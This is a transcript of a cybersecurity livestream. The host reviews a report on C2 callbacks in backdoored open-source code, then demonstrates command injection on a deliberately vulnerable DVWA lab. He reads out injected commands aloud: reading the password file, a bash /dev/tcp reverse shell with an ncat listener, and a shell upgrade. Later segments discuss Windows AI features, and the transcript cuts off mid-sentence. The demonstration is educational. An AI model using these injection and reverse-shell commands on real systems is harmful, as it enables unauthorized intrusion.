And welcome everyone, greetings, and it is time for another episode of CyberCast IRL. Man, I'm jazzed up this morning. I'm ready to rock. I have the tackling fuel right over here, but I already had a good little shot in the arm this morning from doing jaw jacking with Jerry. We had a lot of fun after little backstage conversation with DJ BSEC and James McQuiggan and Jerry. We were just kind of like racking our minds over how this whole technology thing, especially in the job market today, goes a little crazy out there. So, I mean, I hope you're doing well. I hope you're doing all the things you want to do when it comes to cybersecurity. That's what this show is all about. And if eventually you do get some value, you find this to be entertaining or whatever, you know what to do. Don't forget to hit that like and subscribe button. Now, if you don't like this show, the best thing you can do is hit the like and subscribe button, and that lets me know how much you couldn't stand this show, right? So, good to know. That said, if you're wondering and you're new, if you are new, by the way, give us a little shout out. Let us know that you're there. Even if you're just going to lurk today, that's totally cool. You don't have to be a part of the conversation. We just want to say hello. We want to say, hey, good to see you here. I'm glad you made it. And let me know how you found the show, what you like about it if you do. And hit something up in those comments. Don't forget those comments. We also have a Discord. So if you want to be a part of the Discord, link in the description to join the Discord. Got great conversation that happens there every day. Love for you to be a part of it. You can just kind of drop your comment or whatever and walk away and come back and see what's biting. What's going on with that? Did anybody give me a good answer to that? You never know when very well may spark that thing you needed to get that answer. All right. The other thing we do is we check in with chat, and we see some great people already here today. A lot of my ride or dies. Now, this is an AMA kind of thing. We're going to talk about some stuff that I have on the burner, the topics of conversation I can bring up, but you can bring up a topic of conversation as well. Maybe you have a question. Maybe you got something cool you want to bring to our attention. This is a community effort. I'm just kind of the host. So if you're thinking that, oh, this is the Daniel Lowry show, I mean, other than the fact that I'm the one kind of orchestrating everything, then yes. But other than that, we are a community. I love hearing from my chat. So if you're in chat, feel free, ask me a question, throw out a comment, get a good conversation going on so that we can all learn and benefit from it. That's what this show is all about. Even if it's a hot take, even if it's something like, I don't like this, I'm sick of that. Recently just started a new channel in the Discord server, which is called Burnout Alley. Because sometimes that happens, right? Sometimes you're just like PO'd at something. You're allowed to have that. You're allowed to feel those feelings and get them out and get some venting. And that's what we do over there. So if you want to vent something, throw that in here as well. We can all vent with you, because I'm sure if it's frustrating to you, it's frustrating to somebody else. See a lot of great people in the chat. Now, I do my very well best to get to the chat and see your comments. If you want to give me a comment and make sure I see it, let's jump over here and let me show you how that works. All right, if you're new to YouTube, which I'm sure you're not, but you see like Space Tacos here, right? Space Tacos is saying, hello again, Daniel Lowry. And you can see they added my name. So therefore, I can see that really easily from the rest of the chatter. Not that the rest of the chatter is not awesome, like Spandex Thunderstorm. Amazing name, by the way. I love that. Saying some shout outs. Hello to everyone. So if you want to grab that attention, make sure you at my name. If I do miss it, my boy Wayne right there, Wayne's Real World, he will do his level best to back clean up for me and kind of get it to my attention that so-and-so's trying to catch your attention with this question. They ask such and such. He'll spam me. And hopefully I can see that. A lot of great people in the chat today. We got Anita Sailors, Brian Bauer in the house. We got LeGrat. Let's see here. I saw Alicia Grimm in there. I've seen, who else is in here today? Keith Sloan, McWillis. We got Dead Beef Code. Love that username as well. Great usernames. And today, Carrie Chasen. I know I'm saying it wrong, but that's how I learned it. And that's how I'm going to continue to, until you correct me well. Lubbock. Let's see here. Account Luke Canfield. It's Luke Canfield getting fun with his name. I do enjoy that. Anita Sailors. We already said Anita, but hey, never hurts to shout out Anita Sailors again. Not only IT, the tuber XRY. I'm sorry, XYZ, the XRY. I don't know. My wife, Mark Fuentes. Good to see you, Mark. Okay, so yeah, a lot of great folks already pulling up to the station here. We're going to have a great time today. Tech Grunts, my man. What's up, Tech Grunts? Steve Young, 8 Air Bab. It's good to see you there, Bob. I hope you're having a great day there, Bob. You get that venison? I heard you had a good one. The kid hit the old deer with a car. You know, they just run right out in front of you if you're not careful. You got to be careful. Good to see you guys out there today. So, Rogue Outlaw, heading to my first cyber meetup. Time to meet the strangers. That is right. And it doesn't get any stranger than you, right? Just kidding. Throwing some shade. But there you go. If you want to catch my attention, that's the best way to do it, is make sure you at my name, and I can see that really, really well. That said, we're about 5 minutes in. We got to do something else. A little ritual we do before we get the show really up and running. And that's a little thing we like to call the morning pour. And that's where I grab this lovely camo cup that I have been dragging across God's creation for who knows how long now. We call it the Lord's Camo Cup because woodland camo is the only acceptable camouflage. You know, there's time and place for the others, but in general, this is the way to fly. And today we will be using what do we got here? Monster Energy Zero Sugar Ultra Fantasy Ruby Red, because like I said, that's the case of Monster that I have right now. It's technically kind of red, pink, and lavender and black, right? So this is kind of a multicolor. Not quite the polka-dotted dream that Carrie and I have been hoping for, but, you know, we'll take what we can get. A little ASMR for you this morning, kids. Let's get to it. Got to get that tackling fuel. Let's get the crack. You know, it was weak on the front end, but good on the back end there, right? It wasn't too bad. Oh, what am I doing with the microphone? We need that down there. And then we get that pour. Y'all ready? Y'all ready to do it? Let's get to pour. Pour, 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 pour. I'm gonna go for a big one today. I think I'm gonna get it. Oh, it's right at the top. A perfect pour. A perfect pour. I can't even tap it. I can't even tap it. We got to get a sip. There it is. Come on. Tap that ice. Come on. Oh, that's good. Oh, that's a tasty dream right there. Ultra Fantasy Ruby Red. You have done me well today. That's not bad. I do enjoy the Ultra Fantasy Ruby Red. Is someone at my door? It is someone, yes. It's okay. It's my daughter. She needed to ask me a question, but I guess she decided otherwise. Well, how about that, kids? We got a good pour this morning. I feel like it's going to be a good one. Tap that ice. That's right, DJ B-Sec. Code Brew in the house. What's up, Code Brew? Good to have you. And let's see, here's Find the True. Oh, what to see? Neckbeard 777. Love it. Justin Gold. What's up, Jay Gold? My man. Yeah, that was a good pour. Legrat. Noah Grayson. Just checking in with chat. Lost Gambler. Oh, man. Victor Rosa made it in. Good to see you, brother. Good to see you. Duke Norris. All right. So now that we're into that, we can get into the cyber stuff, man. That is the name of the game. That's what this whole show is all about. So let me see what I got for us today, because I do have topics of conversation that we can get into. If you have a question or a comment or whatever, don't forget, you can throw that in the chat at my name so that I can see it. But let me get this. Let me do that. Let me do this. That's not what I want there. Oh, yeah, I've got this whole list. I'm a fool. All right, so I thought this was really cool. A little something, a little Kickstarter here. Let me copy that link. Where's the copy? There it is. Copy. Let's go check it before we wreck it. Paste and go. Saw this morning. Tracking C2 backdoors in open source projects. This looked super cool. So I haven't looked at it. This is completely like, what do they call that? A reaction, right? This is a complete reaction video. I just saw it in LinkedIn this morning and was like, ooh, this will be good for the show. So this is all I saw was this front page. Tracking C2 backdoors in open source project. So throughout their investigation, we identified hard-coded C2 IP addresses embedded into open source projects through multiple vendors. And the reason I thought this was super cool was because these are the things that, as cybersecurity professionals, you really need to be on the lookout for, because this is going to be like a supply chain attack. There are going to be malicious packages that are stored in well-known and used repositories, things like NPM, things like PyPy, right? AMIs for images in Amazon or whatever the case is. You have to know what's going into your environments. And people out there doing the good security work to check and see, hey, is there anything malicious out there? Oh, yeah, absolutely. There's absolutely some shenanigans going on out there in the reals world. And here we go. It says several public POCs. Hello? Can you do this for me? There we go. Several public POCs included hidden callbacks pointing to external servers, often without any justification. These callbacks were triggered during code execution, potentially exposing analysts and researchers to silent compromise. And that's what you do not want. You're just like, oh, this is going to be great. I'm going to be able to like add this cool feature or functionality to my blank. And you added a feature, all right. It just wasn't a feature you would call a feature. It's a feature those threat actors call a feature. They love that feature. That's their favorite feature. Backdoored or modified source code. We found source code. I see this a lot when it comes to like apps, like phone apps as well. So don't think that they're safe at all. Found the source code that had been intentionally altered and introduced outbound connections to attacker-controlled IPs. A lot of times what they'll do is they'll kind of typo squat. So they'll take an open source project, they'll either one that's been abandoned, and they'll just repurpose it for malware. They'll create like a fork of that project, put malicious code in, typo squat the name of it, so you get confused on which one's the right one, and you download the wrong thing. And it does all the things that the original does, plus the feature, right? So that's a problem. Code comments. In some cases, the malicious C2 endpoints wasn't in the active code at all. It was placed inside commented sections, such as pattern. Such patterns suggest failed attempts at obfuscation, abandoned backdoors, and developer testing artifacts. The full report includes 4 detailed cases. Oh, heck yeah. Heck yeah, I want the full report. Where's the full report? Did I pass it? I want the full report. Don't make me. Oh, there it is. Access to. My bad. Here we go. It's a malicious PDF. Sweet. I just got hosed. Can you with the thing here? All right, let's zip through this thing. Gonna do that? Yeah. All right, we got 4 examples. Image Magic Payload Image. It's from 2016. Here's one from 2017. But that's cool because it's still a really good learning experience. You could go do the same thing. Just go download some packages and see if you can find malicious stuff. Do some threat hunting, right? Oh, man. If Wade was in the house, you know what we'd be saying right now. And he'd be like, please stop. Please just stop. Let's see here. NISA agent implant hosted on GitHub. Backdoored fast JSON POC. And Android rats with C2 IP address. Cool. So there's the summary. C2s appeared in 3 distinct ways. In exploits and proof of concept code, inside intentionally backdoored source code, in source code comments. Okay. So there's POC in the code itself. It's inside intentionally backdoored source code. Okay, cool. This was solely conducted for educational purposes. No exploitation, unauthorized access, and blah, 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 blah. We did no badness. Well, good. I'm glad to hear it. Backdoored exploits. Attackers often embed a callback to a command and control, or C2, turning a POC into a delivery mechanism. Backdoored source code. So you have backdoored exploits and backdoored source code. Open source projects can be forked and modified by anyone. A malicious actor can publish a modified version. Told you. Comments. The malicious C2 endpoints is not removed from the project entirely. Instead, it is simply commented out within the source code. So yeah, that's probably like those abandoned projects they were talking about. Let's see some of this. A payload used to backdoor the ImageMagick vulnerability in 2016 contained an embedded IP address belonging to an alleged C2 infrastructure. So we can go in here and we can look at this. And there it is, right there. I don't know if y'all can see that very well, but that's your money. You'll notice you got this URL, and it's piping like they do. It's grabbing an image, and then I guarantee embedded within this image right here, that's why it's piping it to bash, is a simple bash reverse shell. Booyah. So this downloads an image, and once that image gets downloaded, it pipes it as input to, and it might not even actually be an image, because you can name your file anything you want. I can name a text file .jpeg, and it's still a text file, right? It's just you just gave it the wrong ending, right? So just because it says image.jpg doesn't mean it is an actual JPEG. And even if it is, you can hide information into there. So that's interesting. So it is downloading that and then piping bash into this. Interesting. Okay. Yeah, the more I look at it, the more I'm going, hold on, what's going on with that? It's piping that into bash. It's piping the okay, that's a weird thing that's doing, but very, very odd. So the URL has a URL, and then, okay. So pipes just kind of like string stuff together, not in a command, not like a bash one-liner way, but where you take the output from one command, but that's just a file, and then you pipe bash. This could just be like a command injection vulnerability right there. That might be what that is, because you can use pipes as a command injection vulnerability. Attack vector. Cools. All right. That's just interesting. Let me go check in with you in the chat room. What are you guys thinking about this? Let's get in here. Let's just see what y'all got going. Man, I wish I could had an easier way to see things. Where are we? Tap that ice. Okay, I saw that before. People saying hello to my wife. Yeah. Oh, I don't even know what's going on there. Daniel is doing the things. Yes, he is. Since Oracle and VMware were compromised, what else would you use for VMs? Hyper-V, I guess. Right? Proxmox. KVM. Those are possible. This is from Anita Sailors. How do you guys describe what you guys do to your families? I need ideas. I don't even know what that means. Here's one from Alicia Graham. What do you think about the tech that is coming out to collect data on kids in China about how focused their thoughts are as they study, or tech that tries to recreate an image in the head? Yeah, I'm a bit, we'll get to, obviously, I'm trying to play catch up here. I'm a bit of what's the word? I like to kind of hang back, and I'm a wait and see kind of person. Like, what's the purpose of all this technical integration into the like humanity? Like, what do they call that? I forget the name of it right now, where you're integrating technology into humanity. Why is that escaping me? What is the word? What is the word for integrating technology into humanity? What is it called? Why is it escaping me? Why? And I can't even get a term for it. Techno-human symbiosis. No, that's not the word. Anyway. I'm sorry. I'm going down a rabbit hole. You just watched it. Yep, there it was. That was ADHD right there, kicking in. So yeah, I'm just not I don't know about that stuff, man. Tech Grunt says, shenanigans, you say. Let me get my broom. Little South Park reference. Shenanigans. All right. What do you guys think about what we're looking at here? Oh, I should probably bring you in on the conversation. Here we go. Threat hunting matched up, right? Yes. Space Talkers, you had to do it. You just had to do it. We're talking turkeys. White hat sheepdog in the house. Too bad it. I'm glad I happened to see that because that little space right there gets you every time, doesn't it? The SecOps group is offering a free cert for network security called CNSP for Black Friday. What's up, Friday? Go grab that, guys. Go get your hands on stuff. Okay. How it feels forever since we last chatted. Yes, it does. Like all of 20 minutes ago. Here comes the raid. How was the show? Hope everybody enjoyed James McQuiggan's show with the real Bilbo. Man is a national treasure. Both of them are, actually. I'm going to go ahead and put that out there. A URL within a URL. Inception. Let's see here. Alicia Grimm. How do you use development tool to exploit, like CTF yesterday, to make 67 charge of registration to get in chat for free? I didn't see the CTF, so I don't understand the reference that you're making there. If this is too big of a question, it's not necessarily too big of a question. You're basically asking, and correct me if I'm wrong, and I'll get chat close to being current. But basically what you're asking is, how do you take your skills when it comes to scripting or whatever and utilize it in like working through a CTF or maybe even a real life bug or something like that? Isn't 6-7 a meme now? Yes, it is. 6-7 is a thing that the kids say. But going back to this, is that what you're saying? 6-7, not 67. It's 6-7. How to make 67 charge of registration? I don't know what that means. So if you could clarify, that'd be good. It was 6-7 was the charge to get into the chat for the CTF. Okay. Not really understanding. Give us a little more context around the CTF for those of us that were not a part of it. Because otherwise it's going to be really difficult to give you a good answer on that. We got Super User Do says, how does that pipe command injection work? That's a great question. You know what? Let me turn on a computer here. Give me just a hot second, and I'll show it to you. Once that gets rocking and rolling, this shouldn't take too long. Let me get here. Go ahead and see if we can connect. Come on. So I'm gonna spin up a vulnerable VM so that I can show you, because it's easier to show it to you than it is to just straight up explain it. There we go. Let's get logged in. Yay. Here comes computers. Linux Mint. And we're going to get VMware Workstation up and running. So let's go with Sure. Why not that? Oh, actually, I just need Kali. I just need my Kali up and running. Let's get Kali up and running. Kali up and running. We're going to do some Kali stuff today because it's fun for us. Go away. Cancel. Devil. I don't need you to do this. For whatever reason, Linux Mint has this little bug where if you're RDP'd in, you get this. Anyway. Let's get this out of the way now. Actually go down here. Isn't this fun? Aw, I hate when I do that. Gotta make sure I can see what I'm doing. All desktops. There we go. Come over here and get another. Going, get this. Get logged into that. Yes. Kali. All right. When you're doing command injection, you're getting ready to get a free lesson on command injection. You are welcome. So let's use DVWA, right? So I've on my Kali machine, I've got a Docker container running DVWA. So I can go to http://dvwa.local, and I can turn the proxy server off, try again, get logged in, admin, and password for DVWA. Let's go change the security because it's on impossible. Like, I don't know why that's the default setting for DVWA is to go impossible, but is what it is. All right, so they got a command injection vulnerability right here. So first off, you got to be able to like find it. You got to say, hey, what does a command injection, what would make me go, hey, that might be command injection? A lot of times you'll see this on things like this, where you have a web application and it's doing something where it's reaching into the operating system. So whoever coded this said, you know what? I don't need to build a network protocol that actually sends packets in the raw on ICMP as the protocol. You know, why reinvent the wheel? Ping exists on the machine. So if I need to do some sort of network connectivity functionality, you see this a lot with IoT devices, specifically stuff like that, right? Little home routers. I need to be able to, administer them and make sure that they can actually connect the device. Have a little administration function that says, hey, let me connect. So you find a lot of these things to be vulnerable from time to time with a command injection. So I go cools and I say, okay, well, let me try to do something. Let me try 127.0.0.1. Let me see how this works. Do I think that this is actually running, right? And if you look at this output, that looks a lot like if I were to do ping 127.0.0.1. 2, 3, 4, right? That looks a lot like that, like almost identical. So I'm fairly certain that this output is being generated by the actual ping command. So when someone wrote the code, and we can, that's the great thing about DVWA is they do have this view source button. You can look at this code and say, oh, what the actual heck is this? Like, what the actual heck is this? And it's saying the command equals shell exec. So this is PHP, and it's just running ping. So they're not rebuilding, not reinventing that wheel. And then they just take in the target as a variable. So when I come in here and I put 127.0.0.1, that value goes into that variable and it becomes a part of that statement that gets executed by the PHP code. This is kind of like they call them exec statements or eval statements. Sometimes eval is there, and you just remember eval equals evil. So cool. So if I do 127.0.0.1, and then I use something because you can one-line stuff. I can do the same thing here. Ping 127.0.0.1. I'll do this. Right? And that'll run. But what if I want to do something right after that, like do a who am I? So I can use a semicolon like that and do who am I? You can see, I forgot to do, because ping's a bad, do -C2. There we go. That way it only does 2 pings. Run that, it pings twice, and then it tells me, oh, you're Kali. Oh, cool. And now I can just start stringing stuff together. And I can do an ls. Does 2 pings, it tells me my name is Kali, and then it ls's my stuff there, right? My directory, right? So cool. And that's how that works. Now there are other things that can work with that as well. There are other different types of characters that can make that happen. One of them is a pipe command. That's that straight up and down thing right there. You can pipe things into stuff. So if I echo, this is a string of text like that, and I pipe that into the base64 command, guess what it's going to do? It's going to give me a base64 string. So I took this output, which would normally just look like this, right? So there's your output. and I piped it into base64, and base64 took it as input. That's what's happening there. All right, so cool. I can do the opposite, right? I can take this string of text. I got to get it doesn't like the double equal padding of base64. I can echo that into base64. I can do a -D to decode. And look, it says this is a string of text. So I can use that kind of character. That's what we were looking at before. Or at least that's what it seemed like it was doing, like a command injection. So I can do a command injection here, and I can start testing characters. Does this character work? Does the semicolon character work if I do ls -al, or if I do something like cat etsy password, fire it off. And yep, sure does. It ran the cat command. Cool. So now I can do things like we saw over on, where's that at? Right? We saw, where was it? I am losing my mind. There it is. Well, if we go back here, when we looked at, where was there like little example stuff? Oh, it was in that PDF. Let's go here. When we saw that shell, come on. Right there. This thing right here. You know, it says --i, and then it does this dev TCP thing, ON1 business. This is basically going, cool. Run, it looks like it's trying to run this command. So we can test something like this. Let's go back. So let's do 127.0.0.1. And then I'm just going to try pipe and see if it works. I'm going to try to do exactly what they did. And I'll do bash, what is it, -i, and then, I never remember this one, dev TCP, and I'll do, I'm on 10.10.10.146, I think is this one. We'll do 9999, give it a port. So I'm giving it the IP, oh, that's 146. There you go, Daniel, get it right. So I'm doing that, and then we do and 1 like that. And if that works, we should get a shell. So let's spin up a shell. Our listener, ncat-nvlp on port 9999. And let's see if that works. That might not work, but we'll see. We'll see what's going on. All right, so, and that doesn't mean I can't get shell. I could try another 127.0.0.1. And the pipe command just might not be doing it for us. So let's just test it. I'm going to try ls. Oh, yeah, so that's working. The pipe command is legit. It does work. You'll notice we didn't get the IP config output, though, right? Isn't that crazy? So it's just like, okay, cool. I don't know what to do with that, so I'm just going to run ls. LS can't take the output as input. It doesn't do anything for it, so it just chops it off. So, okay, all right, we got that. Let's try to get that shell now. Let me try this shell, which is, I knew this one a whole lot better, which is /bin bash into dev TCP /10.10.10.146 on port 9999 and do, what is it? It's 2 and 1 and then O and 1 and then ampersand. Oop, one too many. Did I get it? I can't see. Yeah, I got it. Cool. Let's try that one. See if that works. Oh yeah, there you go. So now I have shell. Cool. Now you can run Python 3-m, not MC, and do import pty.spawn of bin bash. Just get a little nicer shell going on. Oh, Python 3 is not found. Yeah, okay. This is an older device. So import pty.spawn bin bash. You getting a free lesson today, kiddos? Free lesson. What am I doing wrong here? Oh, Python is not found. It doesn't have Python on it. Well, that's cool. I mean, you still got this thing going on. It's just janky. And you can start LSing and doing all sorts of fun stuff. So, oh, you know what it is? Is that this is a Docker container, and the Docker container just probably doesn't have Python installed. But there you go. That's what a command injection attack is. And now you know, and knowing is half the battle. Let me get back over to what it was we were doing. Let's check chat. Let's check the chat. See what's going on. Oh my goodness. Where is the... Gotta grab this. There we go. That's not what I'm looking for. I need that to go away. There we go. Tyler Ramsby in the house. What's up, everyone? All right, let's go in here and see what I have missed in chat. I can't believe it's 10:30 already. See, that's what happens when you start teaching stuff. Super user do. Bro is on a computer, RDPing into a computer to run a virtual computer, and then I RDP'd into that virtual computer to attack a virtual computer. That's Inception, kids. Where's my totem or whatever it was, the little spinny thing he had. All right, cool. Moving on down the line, we've got Code Bruce Cyber says, sounds like you're describing as improper input validation allows you to change the price of client. Oh, you're talking about that CTF. Yeah, I've got to get some more information on that so we can answer that question. Wayne's Real World says, next 3252 asked to talk about my problem about something lost disabled Gmail account, which I cannot get into due to the phone number need to, which has been lost from destroyed phone. Okay, hold up. Talk about my problem about something with a lost or disabled Gmail account, which I cannot get into it due to the phone number that they need, which has been lost because the phone was destroyed. That sucks. That's not going to be easy. Or maybe if that phone is gone and that phone is the way you get into that account, that you're in deep shiitake mushrooms right there, my friend. I don't know that I could help you with that, honestly. I don't know that Google could help you with that, honestly. Oh, let's see here. DJ BSEC calling out CyberChef. Yep, CyberChef is a great tool for being able to use that. Or doing like base64 decoding. A lot of encoding, decoding. It does a lot of great stuff. It's a really cool tool. Tyler, my man. What's up, Tyler? Rams B. Where are we going? What'd I miss? Okay, it looks like I'm caught up with chat. Have you tried any of the hacker AIs? Is there one that you love? I have not. You know what? Yeah, I might try that for my next CTF. I might just try to see if I can use an AI to help solve it, and just to see how it does. I have no expectation of it doing well or poorly or whatever. Can't you just spoof your old phone number? Maybe if it's coming SMS, White Hat Sheepdog. Maybe. My dude did all that hacking live and couldn't remember what a little spinny thing is called. Hey, man. I'm not a perfect person, Phil Stafford. All right. Casually Joseph, are you in the house? What's up? My man, showing up, showing out. So there you go. We had a little fun doing that. We had an interesting little talk about other stuff when it came to a little PDF about C2 traffic and backdoors and things that are lying in wait in a variety of different supply chain issues that could go on out there. So make sure that you test things, you look at the code, you do something, run it through an AI and say, hey, is there anything that's janky in here? Do some, here's a bunch of IOCs. Just make sure you're running through that before you implement that into your actual production systems. And yeah, that's what's up. All right. What was another thing that I wanted to kind of hang out with us today? Where is my, there it is. because I thought that was cool. We got a little more time. Oh, yeah, this was another thing I saw yesterday. I think it was yesterday. Copy. This just looks cool. Again, kind of let's throw that on the fire. Paste and go. OpenSourceMalware.com. Again, a bit of a reaction to this. I only kind of scrolled through this just a little bit. A community database, API, and collaboration platform to help identify and protect against open source malware. I just thought this was interesting. Search filters. So here's an NPM package. Let's view the details. Threat description. Package contains malicious code. Sign in to view payload details. So yeah, I guess you got to have a sign in to really get into the guts of this thing, but it looks pretty cool, right? Just being able to go here, and if you wanted to maybe download these things, I'm guessing you could. Shows you where they're at, right? Yeah, because that's NPM right there. I do not want to click that because I don't know if it downloads it or just takes me to the site. But I just thought it was a neat resource. I love stuff like this, right? This is the kind of thing that makes cybersecurity interesting to me. I don't know about you guys out there, but I got into cybersecurity because I thought it was really cool. Of course, I come from a different time than a lot of people that are getting into it now, obviously. Because when I was getting into cybersecurity, it was very fringe, counterculture kind of thing. And not that I've ever necessarily been the counterculture kind of person, but I did find the technology side of it very fascinating. And I've said it once, I've said it twice, I've said it a million times. I got a little criminal in me, and it was something that kind of scratched that itch. I was like, ooh, okay, not a lot of people really understand this very well, and to learn about it and to be like, oh, I can access systems by doing this, and I can access systems by doing that. That sounds interesting. So not necessarily a hacker manifesto guy or whatever about that. Oh, everyone should have unfettered and free access to every single thing out there. But I thought it was still an interesting world, and all the tools and just computers were cool. You got to remember, like I started, man, there's a jet trying to land in my driveway right now. I live near a airport, so every now and then they like to take off right over my house. So yeah, that was, and this is the kind of thing that kind of takes me back to that time where I was like, oh, that's interesting, that's cool. Let's learn about these threats and understand them. And then of course, then comes the security. How do we protect against that? It's this whole ecosystem around that. So just really cool stuff. So I just wanted to throw that out there for you good folks. OpenSourceMalware.com. I will copy that just in case you're interested in it. I will paste it into chat. There you go. So let's see here. Did Daniel Lowry just say that he's itchy? Only the BH, man. I don't get it too clean. All right, I went tech next too early. We're not quite there yet, right? We're not quite there yet. Phil Stafford says, have you tried letting him out? Because I got a little criminal in me. Yeah, I have. Yeah, he just wants to take control. That's the problem. Back in my day, we didn't have all these fancy cybersecurity tools that you have now. We had to build them from assembly. COBOL programming. It is true. It is true. I was there when the scrolls were foretold. Oh, let's see. What you guys got going on here in this chat? Keith Sloan says, Daniel Lowry dropping knowledge bombs today. We try. Phil Stafford, who Darth Lowry is Dark Side Lowry. Yeah, it's true. It is. That's the way it goes. Let's see here. How much time we got? Should we just get into tech next? I think we should. I think it's tech neck time. Let me look for my article and get all jazzed up for this. I thought this would be a good one right here. Copy. Spark a little bit of conversation. Y'all get to talking about this. I want you to talk about, whoa, what have I done? What have I done? Billy, get your hands off my keyboard, boy. Get your butt back in the back room. Watch your cartoons. Get out of my face. All right, let's see here. Here comes The TechNet article for today comes from Tom's Hardware with his stark white background and people in their stark white backgrounds. For the love of all that's holy, I'm in a dark room, and then you throw on the full brightness of the sun because you use a completely zeroed out background. My word. I swear, if I ever catch one of y'all using stark white backgrounds one more time, I will pull the live rattlesnake out of the back of my F-150, and I will use it as like a bullwhip and smack you in the face as he fangs you all over your head and shoulders. And then I'm going to wait. I'm going to give it a hot minute before I go get the kit, the snake bite kit. Although, if I've got to suck poison out of your face, you're probably going to die, because I ain't doing that. All right, Microsoft. The top Microsoft execs boast about Windows evolving into an agentic OS provokes furious backlash over AI. Get out of my face, Tom's Hardware. Jeez. Just want people to be able to see what's going on. Users fed up. Oh, yeah, I am. You guarantee you that I'm fed up with this forced AI and cloud features. Hey, you know what? That ain't no joke, honestly, kiddos, right? Like, am I right or am I right? It's like, Microsoft, can you please stop trying to just force this stuff on me? Just give me the option to do whatever the hell it is I want to do with your operating system. Quit trying to get me to sign up for your OneDrive. It ain't going to happen. I'll tell you right now, here's what happens. This is how Daniel works. When you go, hey, sign up for OneDrive. I've noticed you don't have a Microsoft account. You want me to remind you that in 3 days? I want you to remind me of shut the hell up. Get out of my face. Every time you try to remind me of this stuff, it legit makes me go, I'll never do it. Until you make me do it, where I cannot use the operating system unless it happens, and I can't figure any way around it. Every time you try to force me down that road, right? I don't care if it was, hey, I'm going to give you $1 million, but you got to come this way. It's like, don't stop. Don't pull me. I am the stubborn mule. That's how it works. I will bray and kick your loving teeth out if I can do it, trying to get me to go to that water and force me to drink it. It's just never going to happen. So stop. I feel the same way when it comes to advertisements in general, right? You advertise something to me and it's really advertising, and all I want to do is go running to your competitor. That's all there is to it, man. You anti-advertised yourself. Just make cool stuff and be cool. And I'm going to be like, hey, man, y'all seen that cool thing? That cool thing's cool, ain't it? Let's go check that out. That's how advertising should work. Quit trying to make me do it. And that's what we see here, this bull crap. Makes me just want to dip spit all over you, man. Right? So let's see here. The post-comment section quickly turned into a ravenous pool of AI and cloud-hating piranhas. See? You see how that backfires on you right there when you try to force people into stuff? They do not like it. Microsoft's president of Windows and Devices, Pravan Davuluri, tomfoolery. I'm sorry, man. I'm not trying to butcher your last name, but I've made it through the 3rd grade. So reading is dumb. I don't like reading, but you're here making me do it. So he's taking to social media to share his enthusiasm about the evolution of Windows. Microsoft exec wanted to share his excitement about how Windows is evolving into an agentic OS. But we didn't see anyone celebrating alongside. Butchered last name that I can't say. Rather, the comment section quickly was overrun with sharp criticism, reflecting widespread unease about the direction Microsoft seems to be taking Windows. It's like they said, you know what we need to do? Well, this Linux thing its time has come. Let's just go ahead and force people into Linux. Because what did I just get done telling you? When you try to push me into it, all I do is go, hey, is that Linux? Hey, Linux, how you doing? You looking nice over there. Real pretty. You sitting all by yourself. Let's just hang out. Let's do something. That's what happens. Quit trying to make it a thing, right? My goodness, man. I'll let Billy loose on you. Now, he ain't smartest boy in the box, but I will tell you what, he is stronger than a shaved gorilla. That boy right there, I seen him lift up a 350 small block, fully, accessories and everything, man. It wasn't just the block. It had heads on it, timing chain, fan, you name it, Holly double pumper. He picked it up like it were nothing and set it down on the back of my F-150, right? And when he grabs a hold of you, Mr. Pavan, and says, quit trying to make me do stuff, whatever he grabs, it's his. I'm just going to let you know that. He dumber than a tree stump, but man, you don't want him grabbing you. That's for dang sure. Let's see here. It says, yeah. Let's get past that. Used his X profile to tell you how great this is going to be, but no one believed him because it sucks. His enthusiasm regarding the evolution of Windows faced overwhelmingly negative criticism. You don't say. If we had to condense the replies into a single representative super reply, it would probably read something like, no one wants this. We're fed up with AI everything. Windows needs tuning for performance, and Linux is looking good, right? She's the prettiest thing in the trail park right now. That's how that goes. In some ways, we agree with the Windows and PC enthusiast old guard. The execs that steer Windows might be advised to remember that, first and foremost, it's an operating system and should be honed to facilitate the operations its users wish to complete. That's not the only thing I've heard, but a lot of people are like, are you telling me it's got to have access to my files? This is like kind of like a digital version of me that has access to everything, and it will be looking at my stuff. I'll tell you right now, that ain't going to fly. That ain't going to fly if that's what they're doing. Let's see here. Having said that, some of the negativity from social media commenters went a little off the rails. Because here's the thing we know about a comment session is just a safe haven for anyone, right? Bring your kids and bring your wife. I'm sure it's fine. No, it is a hive of scum and villainy. But I'm not saying they're wrong necessarily. But you get Billy in him, man. He don't type so well, but dang, he'll cut you deep. He'll cut you deep, get you down in your soul. You'll be like, I don't even know how I'm going to recover from this. Go to bed crying at night. Your wife's like, what's wrong with you? I thought you were a man. Oh, I'm not anymore. Billy said something in the comment section, made me feel bad about myself. And now I've been drinking all day. And, my feelings is overwhelming me. Let's see here. Laced with artificial intelligence, blah, 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 blah. As long as these features aren't foisted on users who want to ignore the OS and focus on their apps, content, and games, we don't think there will be an uprising or mass exodus in the immediate future. All right, Tom's Hardware. There were 26 comments. Let's see what they say. I'm sure it's not spicy at all. Personally, I feel they should spin it off as a separate product. Call it Copilot OS powered by Windows. Oh, someone taking the high road here. Oh, you know what? That's fine if you want to do that. Just don't make it Windows. Make it something else. Make someone have the option to use it. I'm sure they're going to tell you that like we don't have any designs on, forcing this down anybody's throat. It's just the way it's going. And we see people, and that's how they do. That's how they get you, right? You frog in a hot plate. You're slowly turning up the heat until, guess what? This is how we roll now. Man, I'd rather drink piss out of a boot than be forced into doing something I don't want to do. Let's see. If we were to boil down the resistance or hate into the simplest form, I'd say the problem is loss of control. You don't say. So many people are feeling like they're losing autonomy in their daily lives. And you know what? We got a few minutes left, and I'm going to use the rest of that time because I think that's a great segue. We talked about something in IRL Discord, and it was really good, right? We kind of got into it in After Dark the other night, and it's all about being a human again. We're too plugged into stuff. You got to take a break, man. You got to pull away, go fishing, right? Get the pole out, box cooler full of natty ice, get drunker than Cooter Brown, catch you a few fish, and just chillax with your thoughts. Don't turn on a podcast. Leave your phone in a truck. Put it on silent. Get away from stuff. Honestly, I feel like we kind of turned the dial a little too far past humanity for a hot minute there. Or right now, that's the way it is. Like, get your butt out of the chair and go buy something at the store. Right? What happened to that? I'm sorry. Is it legit too inconvenient for you to like drive 5 to 10 minutes somewhere and pick up whatever you need? Like I can go to Ace Hardware or Walmart or whatever and pick up the thing. I enjoy going, you know what I need? I need a pair of fingernail clippers. I'm gonna run to CVS and oh, is that the kind I need? Oh, it looks like the right size. Perfect. I'm gonna grab those. You know, that's how I grew up. And I think there's some connectivity to other people because I got to go deal with a cashier. I got to deal with getting in my car and seeing other people on the road and that kind of thing. It's just, I'm outside of my little hovel here and doing stuff. I'm living life. It may be mundane, but honestly, what this old 